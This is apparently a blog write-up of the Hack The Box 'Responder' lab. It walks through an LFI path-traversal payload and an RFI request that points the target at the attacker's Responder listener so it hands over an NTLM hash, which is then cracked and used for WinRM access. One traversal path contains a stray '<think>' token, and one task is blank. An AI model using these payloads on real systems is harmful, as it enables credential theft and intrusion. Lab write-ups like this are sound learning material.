Open in app

Sign in

Write

Sign in

Hackthebox — Responder Writeup

Nikola Talevski
3 min readJul 5, 2023

--

Hello!

Today I will be presenting how to complete Responder from Tier 1 on Starting Point.

Firstly, Enumeration with Nmap:

Only one open port: 80

Running Apache webserver on a Windows host.

Task 1

When pasting the IP in the URL it redirects to a webpage named unika.htb, so make sure to add it to /etc/hosts.

Task 2

Wappalyzer is a browser extension, a set of APIs that provide instant access to website technology stacks, company and contact details, social media profiles, email verification and more.

Task 3

Shows you the language of the page built and the parameter, PAGE .

Task 4

The answer is in the question, you just have to read and think.

../../../../../../../../<think>/system32/drivers/etc/hosts

Task 5

Again the answer is in the question, it is a remote file inclusion and needs an IP address in it with ^somefile^.

Task 6

New Technology Lan Manager is a suite of security protocols offered by Microsoft to authenticate users. NTLM is a challenge-response authentication protocol to confirm the user without requiring them to submit a password. Despite known vulnerabilities, NTLM remains widely deployed even on new systems in order to maintain compatibility with legacy clients and servers

Task 7

Task 8

John The Ripper is an Open Source password security auditing and password recovery tool available for many operating systems. John the Ripper jumbo supports hundreds of hash and cipher types.

Task 9

This one was a tricky one as I have never used Responder tool so with a little bit of research and logic, following the questions on HTB, I figured that we had to use Responder with -I flag to point to our tun0 interface provided by HTB vpn.

Responder is widely used for MITM attacks, and when you run it with the -I flag, it shows you the responder IP, our tun0.

When responder is ran against an interface, it sets up a lot of different servers like HTTP, HTTPS, SQL, AUTH PROXY and so on.

It also sets poisoners like:

  1. DNS/MDNS
  2. LLMNR (Link-Local Multicast Name Resolution)
  3. NBT/NS (NetBIOS Name Service) and LLMNR are Microsoft Windows components that serve as alternate methods of host identification.

Upon requesting a resource with RFI http://unika.htb/index.php?page=//10.10.15.195/<inputrandomtexthere> , Responder will poison responses and, if it can, capture any credentials.

In our case it was the admin hash.

Save the hash into a file, and crack it with John the ripper.

Task 10

TCP port 5985

Task 11

WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.

Well Evil.. stands for… your intentions, do good things only.

Have fun!

--

--

Nikola Talevski
Nikola Talevski

Written by Nikola Talevski

1 Follower
3 Following

With a great team, persistence and dedication the sky is the limit.

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams